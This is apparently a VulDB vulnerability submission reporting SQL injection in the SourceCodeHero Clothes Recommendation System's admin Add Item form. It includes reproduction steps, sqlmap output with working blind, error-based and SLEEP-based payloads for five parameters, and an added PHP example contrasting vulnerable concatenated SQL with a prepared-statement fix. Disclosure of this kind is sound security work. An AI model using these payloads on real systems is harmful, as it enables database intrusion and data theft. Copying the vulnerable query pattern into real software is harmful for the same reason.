Submit #427443: SourceCodeHero Clothes Recommendation System - Add Item V1.0 SQL Injection

Information

Title: SourceCodeHero Clothes Recommendation System - Add Item V1.0 SQL Injection
Description: I would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing.

Details:
Affected URL/Endpoint: /Online_Shopping/admin/home.php?con=add
Vulnerable Parameters: 'cat', 'subcat', 't1', 't2', 'text'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Login as admin via /online_shopping/admin
2) Navigate to 'Add Item'
3) Fill up the details
4) Use a proxy like Burp Suite to intercept the request.
5) Input the payload to invoke the SQL injection.

sqlmap resumed the following injection point(s) from stored session:
------------------------------------------------------------------------------------------------------------------------------
Parameter: MULTIPART t1 ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="t1"
1234' AND ELT(7341=7341,1544) AND 'BOKW'='BOKW

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="t1"
1234' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(3483=3483,1))),0x71706a7a71),3483) AND 'LNkk'='LNkk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="t1"
1234' AND (SELECT 9701 FROM (SELECT(SLEEP(5)))Mixp) AND 'AOrS'='AOrS
------------------------------------------------------------------------------------------------------------------------------
Parameter: MULTIPART cat ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="cat"
1' AND ELT(9427=9427,9623) AND 'EvWs'='EvWs

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="cat"
1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(2341=2341,1))),0x71706a7a71),2341) AND 'SfGX'='SfGX

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="cat"
1' AND (SELECT 2614 FROM (SELECT(SLEEP(5)))xQXD) AND 'WFzI'='WFzI
------------------------------------------------------------------------------------------------------------------------------
Parameter: MULTIPART t2 ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="t2"
1234' AND ELT(4970=4970,9601) AND 'WkWf'='WkWf

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="t2"
1234' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(3895=3895,1))),0x71706a7a71),3895) AND 'BMME'='BMME

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="t2"
1234' AND (SELECT 7807 FROM (SELECT(SLEEP(5)))Xqnm) AND 'yDBc'='yDBc
------------------------------------------------------------------------------------------------------------------------------
Parameter: MULTIPART subcat ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="subcat"
1' AND ELT(3810=3810,8721) AND 'lkzy'='lkzy

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="subcat"
1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(7334=7334,1))),0x71706a7a71),7334) AND 'OTYk'='OTYk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="subcat"
1' AND (SELECT 8488 FROM (SELECT(SLEEP(5)))WtQj) AND 'LoqE'='LoqE
------------------------------------------------------------------------------------------------------------------------------
Parameter: MULTIPART text ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="text"
tessst'||(SELECT 0x746a6c59 WHERE 2287=2287 AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(9743=9743,1))),0x71706a7a71),9743))||'

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl
------WebKitFormBoundary9fLy0m0JK4qh9FWl
Content-Disposition: form-data; name="text"
tessst'||(SELECT 0x4a59544d WHERE 5411=5411 AND (SELECT 3006 FROM (SELECT(SLEEP(5)))dZOK))||'
------------------------------------------------------------------------------------------------------------------------------
[13:15:04] [INFO] testing MySQL
[13:15:05] [WARNING] reflective value(s) found and filtering out
[13:15:05] [INFO] confirming MySQL
[13:15:05] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 8.0.0

Please let me know if you need further information or a more detailed analysis.
User: Delvy (UID 74555)
Submission: 21/10/2024 07:24 (2 years ago)
Moderated: 24/10/2024 12:48 (3 days later)
Status: Accepted
VulDB entry: 281682 [SourceCodeHero Clothes Recommendation System 1.0 /admin/home.php?con=add cat/subcat/t1/t2/text SQL Injection]
Points: 17
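The submission does not include the application's source, so the following is an added illustration (written for this page; it is neither the project's code nor the submitter's) of the bug class the report describes and of its fix: an add-item handler that pastes the five multipart form fields (cat, subcat, t1, t2, text) straight into an INSERT statement, next to the same handler using a mysqli prepared statement. The table name `items`, its column names, the `$db` connection and the assumption that cat and subcat are numeric category ids (the report's payloads use `1'` for both) are all assumptions, not facts from the page.

```php
<?php
// Added example, not the Clothes Recommendation System's own code.
// Assumptions: a table `items` with columns cat, subcat, t1, t2, text
// and an open mysqli connection $db. The field names come from the
// report; everything else is illustrative.

// The pattern behind the reported finding: form values concatenated
// into the SQL text. A single quote in any field closes the literal
// early and whatever follows is parsed as SQL by MySQL.
function add_item_concatenated(mysqli $db, array $post): bool
{
    $sql = "INSERT INTO items (cat, subcat, t1, t2, text) VALUES ('"
        . $post['cat'] . "', '" . $post['subcat'] . "', '"
        . $post['t1'] . "', '" . $post['t2'] . "', '" . $post['text'] . "')";
    return $db->query($sql) !== false;
}

// Hardened form: the SQL text is a constant and the five values are
// sent as bound parameters, so quotes in the input stay data. This
// holds no matter how the request was encoded (urlencoded or
// multipart), because the fix is on the database side, not the
// transport side.
function add_item_prepared(mysqli $db, array $post): bool
{
    foreach (['cat', 'subcat', 't1', 't2', 'text'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return false; // missing or non-scalar field: reject rather than guess
        }
    }
    // Assumed: cat and subcat are category ids, so insist on digits only.
    // This is input validation on top of binding, not a replacement for it.
    if (!ctype_digit($post['cat']) || !ctype_digit($post['subcat'])) {
        return false;
    }
    $stmt = $db->prepare(
        'INSERT INTO items (cat, subcat, t1, t2, text) VALUES (?, ?, ?, ?, ?)'
    );
    if ($stmt === false) {
        return false;
    }
    $cat = (int) $post['cat'];
    $subcat = (int) $post['subcat'];
    // 'iisss': two integers followed by three strings, matching column order.
    $stmt->bind_param('iisss', $cat, $subcat, $post['t1'], $post['t2'], $post['text']);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

Two points from the report are worth reading against this code. First, sqlmap labels the injection points as MULTIPART POST parameters; that only says how the browser submitted the Add Item form, and intercepting the request with a proxy is needed because the form itself is not where the bug lives. Second, the error-based technique listed for every parameter works only because database error text reaches the HTTP response (the "reflective value(s)" warning is sqlmap noticing its own input echoed back). Turning off error display in production narrows what an injection can reveal, but the boolean- and time-based variants in the same output do not need error text at all, so the prepared statement is the actual fix and the error handling is defence in depth.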
